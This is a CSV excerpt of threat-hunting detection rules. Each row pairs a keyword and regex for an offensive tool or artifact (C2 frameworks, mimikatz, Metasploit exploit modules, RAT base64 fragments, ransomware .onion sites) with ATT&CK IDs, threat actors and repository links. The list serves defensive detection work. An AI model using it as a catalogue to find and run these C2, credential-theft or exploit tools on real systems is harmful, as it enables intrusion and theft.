"*veqlxhq7ub5qze3qy56zx2cig2e6tzsgxdspkubwbayqije6oatma6id.onion*",".{0,1000}veqlxhq7ub5qze3qy56zx2cig2e6tzsgxdspkubwbayqije6oatma6id\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62173"
"*Verified Merlin server *",".{0,1000}Verified\sMerlin\sserver\s.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","62174"
"*verovaleros/domain_analyzer*",".{0,1000}verovaleros\/domain_analyzer.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Reconnaissance","https://github.com/eldraco/domain_analyzer","1","1","N/A","N/A","6","10","1858","241","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z","62175"
"*version %defenderremoverver%*",".{0,1000}version\s\%defenderremoverver\%.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","62176"
"*vh.4everproxy.com/secure/*",".{0,1000}vh\.4everproxy\.com\/secure\/.{0,1000}","offensive_tool_keyword","4everproxy","proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://www.4everproxy.com/","1","1","N/A","this pattern could be observed in any proxyfied site","6","10","N/A","N/A","N/A","N/A","62177"
"*victim_host_generator.py*",".{0,1000}victim_host_generator\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","62178"
"*VID_03EB&PID_2403*",".{0,1000}VID_03EB\&PID_2403\s.{0,1000}","offensive_tool_keyword","Hak5 Rubber Ducky","keystroke injection tool	","T1021 - T1056.001 - T1060 - T1573 - T1573.002","TA0002 - TA0007","N/A","N/A","Hardware","https://github.com/greghanley/ducky-decode-wiki/blob/master/Guide_Change_USB_VID_PID.wiki","1","0","#deviceid","can appear in windows eventid 6416","10","1","2","0","2015-03-15T02:45:33Z","2015-03-15T02:45:31Z","62179"
"*VID_0483&PID_5740*",".{0,1000}VID_0483\&PID_5740.{0,1000}","offensive_tool_keyword","FlipperZero","Flipper ZeroFlipper Zero is a portable multi-tool for pentesters and geeks in a toy-like body","T1021 - T1056.001 - T1060 - T1573 - T1573.002","TA0002 - TA0007","N/A","N/A","Hardware","https://docs.flipper.net/qflipper/windows-debug","1","0","#deviceid","can appear in windows eventid 6416","10","10","N/A","N/A","N/A","N/A","62180"
"*Viedx765valdi\\Usedx765er Data*",".{0,1000}Viedx765valdi\\\\Usedx765er\sData.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","62181"
"*viewdns-get-rootdomains-ip-ns *",".{0,1000}viewdns\-get\-rootdomains\-ip\-ns\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","62182"
"*viewdns-get-rootdomains-whois *",".{0,1000}viewdns\-get\-rootdomains\-whois\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","62183"
"*Villain.git*",".{0,1000}Villain\.git.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","62185"
"*Villain/Core*",".{0,1000}Villain\/Core.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","62186"
"*villain_core.py*",".{0,1000}villain_core\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","62187"
"*vil-proxy/quickcert*",".{0,1000}vil\-proxy\/quickcert.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","62188"
"*vincent.letoux@gmail.com*",".{0,1000}vincent\.letoux\@gmail\.com.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","#email","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","62192"
"*vip.youwe.shell.core.shell*",".{0,1000}vip\.youwe\.shell\.core\.shell.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","62193"
"*vip.youwe.shell.shells.payloads.java*",".{0,1000}vip\.youwe\.shell\.shells\.payloads\.java.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","62194"
"*vip.youwe.shell.shells.plugins.java*",".{0,1000}vip\.youwe\.shell\.shells\.plugins\.java.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","62195"
"*viper/*.sock*",".{0,1000}viper\/.{0,1000}\.sock.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","62196"
"*viper-dev.conf*",".{0,1000}viper\-dev\.conf.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","62197"
"*viperpython-dev*",".{0,1000}viperpython\-dev.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","N/A","10","","N/A","","","","62198"
"*viperpython-main*",".{0,1000}viperpython\-main.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","N/A","10","","N/A","","","","62199"
"*viperzip.exe*",".{0,1000}viperzip\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","62200"
"*Viral - Rat By Sameed.exe*",".{0,1000}Viral\s\-\sRat\sBy\sSameed\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","62201"
"*VirTool:PowerShell/Scanpatch.A*",".{0,1000}VirTool\:PowerShell\/Scanpatch\.A.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","62212"
"*VirtualAlllocEx/Payload-Download-Cradles*",".{0,1000}VirtualAlllocEx\/Payload\-Download\-Cradles.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","62220"
"*virtual-host-enumeration.py*",".{0,1000}virtual\-host\-enumeration\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","62221"
"*VirtualShell - PoC to create virtual account process*",".{0,1000}VirtualShell\s\-\sPoC\sto\screate\svirtual\saccount\sprocess.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","62222"
"*viRu5/GoogleChromeAutoLaunch.py*",".{0,1000}viRu5\/GoogleChromeAutoLaunch\.py.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","62223"
"*viRu5\GoogleChromeAutoLaunch.py*",".{0,1000}viRu5\\GoogleChromeAutoLaunch\.py.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","62224"
"*virusscan_bypass.rb*",".{0,1000}virusscan_bypass\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62225"
"*VirusTotalC2.*",".{0,1000}VirusTotalC2\..{0,1000}","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","N/A","10","10","27","81","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z","62226"
"*Visual-Studio-BOF-template*",".{0,1000}Visual\-Studio\-BOF\-template.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","62227"
"*VITE_STRIKER_API*",".{0,1000}VITE_STRIKER_API.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","62228"
"*ViziosDe/MDExclusionParser*",".{0,1000}ViziosDe\/MDExclusionParser.{0,1000}","offensive_tool_keyword","MDExclusionParser","PowerShell script to quickly scan Event Log ID 5007 and 1121 for published Windows Defender Exclusions and Attack Surface Reduction (ASR) rule configuration.","T1562.001","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/ViziosDe/MDExclusionParser","1","1","N/A","N/A","5","1","6","1","2024-06-12T14:17:08Z","2024-06-12T11:56:07Z","62231"
"*vkvsgl7lhipjirmz6j5ubp3w3bwvxgcdbpi3fsbqngfynetqtw4w5hyd.onion*",".{0,1000}vkvsgl7lhipjirmz6j5ubp3w3bwvxgcdbpi3fsbqngfynetqtw4w5hyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62232"
"*vletoux/MakeMeEnterpriseAdmin*",".{0,1000}vletoux\/MakeMeEnterpriseAdmin.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","62233"
"*vletoux/NTLMInjector*",".{0,1000}vletoux\/NTLMInjector.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","1","N/A","N/A","10","2","167","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z","62234"
"*VlZSS2VrMVdWa2RhTTJScFVtdGFXbFJWWkc5VlZscFZVbXhLWVUxVlNsVlZWbU14V1ZVeGNXSkVTbGhoYTI4d1dXdGFjbVZYUmtsaVIyeE9ZV3RhZWxZeFdtOVdNREZJVTJwV1QxZElRbWhXTUZaMlpWWmtjMXBJVG14V2JYY3hWR3hrZDJGVk1YRlJibFpTVFc1Uk1GVXhXbEpsUmxKelZtdHdVMUpGU25WVk1qVjNVbXMxVmsxWVFrOVRSMmhRV1ZjeGEwMVdVbGRVVkVKc*",".{0,1000}VlZSS2VrMVdWa2RhTTJScFVtdGFXbFJWWkc5VlZscFZVbXhLWVUxVlNsVlZWbU14V1ZVeGNXSkVTbGhoYTI4d1dXdGFjbVZYUmtsaVIyeE9ZV3RhZWxZeFdtOVdNREZJVTJwV1QxZElRbWhXTUZaMlpWWmtjMXBJVG14V2JYY3hWR3hrZDJGVk1YRlJibFpTVFc1Uk1GVXhXbEpsUmxKelZtdHdVMUpGU25WVk1qVjNVbXMxVmsxWVFrOVRSMmhRV1ZjeGEwMVdVbGRVVkVKc.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#base64","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","62235"
"*Vm14YVUxTXlWbkpOVm1SWFlUSlNhRlJVU2xOalJsWjBaRWRHV0dKR1NsZFhhMk0xVm14YWMyTkdXbFppV0doTVYxWlZlRlpzVG5OV2JGcFhZbFV4TkZZeFdsWmxSMDVZVTJ0V1ZHSkhhRzlaVkVrMFpERmtXR1JIUm1waVZscFpWVzEwYzJGV1NYbGxSVGxhVmpOU2FGcFhlRnBsUm1SMFQxWmtUbEpGV2twV1ZFcDNWakZSZUZwRmJGSmlWMmhZVkZWYVlVMXNjRmRY*",".{0,1000}Vm14YVUxTXlWbkpOVm1SWFlUSlNhRlJVU2xOalJsWjBaRWRHV0dKR1NsZFhhMk0xVm14YWMyTkdXbFppV0doTVYxWlZlRlpzVG5OV2JGcFhZbFV4TkZZeFdsWmxSMDVZVTJ0V1ZHSkhhRzlaVkVrMFpERmtXR1JIUm1waVZscFpWVzEwYzJGV1NYbGxSVGxhVmpOU2FGcFhlRnBsUm1SMFQxWmtUbEpGV2twV1ZFcDNWakZSZUZwRmJGSmlWMmhZVkZWYVlVMXNjRmRY.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","#base64","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","62236"
"*VMSA-2023-0001.py*",".{0,1000}VMSA\-2023\-0001\.py.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","Black Basta","Exploitation tool","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","N/A","Added to cover the POC exploitation used in  massive ransomware campagne that exploit public facing Vmware ESXI product ","4","2","149","22","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z","62237"
"*VMware detected!!!*",".{0,1000}VMware\sdetected!!!.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","62238"
"*vmware_vcenter_uploadova_rce*",".{0,1000}vmware_vcenter_uploadova_rce.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#content","N/A","7","10","N/A","N/A","N/A","N/A","62239"
"*vmware_view_planner*uploadlog_rce*",".{0,1000}vmware_view_planner.{0,1000}uploadlog_rce.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62240"
"*vmware_vrni_rce_cve_2023_20887.rb*",".{0,1000}vmware_vrni_rce_cve_2023_20887\.rb.{0,1000}","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tool","https://github.com/sinsinology/CVE-2023-20887","1","1","N/A","N/A","N/A","3","232","43","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z","62241"
"*vmware_workspace_one_access_cve_*.rb",".{0,1000}vmware_workspace_one_access_cve_.{0,1000}\.rb","offensive_tool_keyword","POC","POC for VMWARE CVE-2022-22954","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/rapid7/metasploit-framework/blob/62bfe03b50a22785b59a069319520531f2663b2b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb","1","1","N/A","N/A","N/A","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62242"
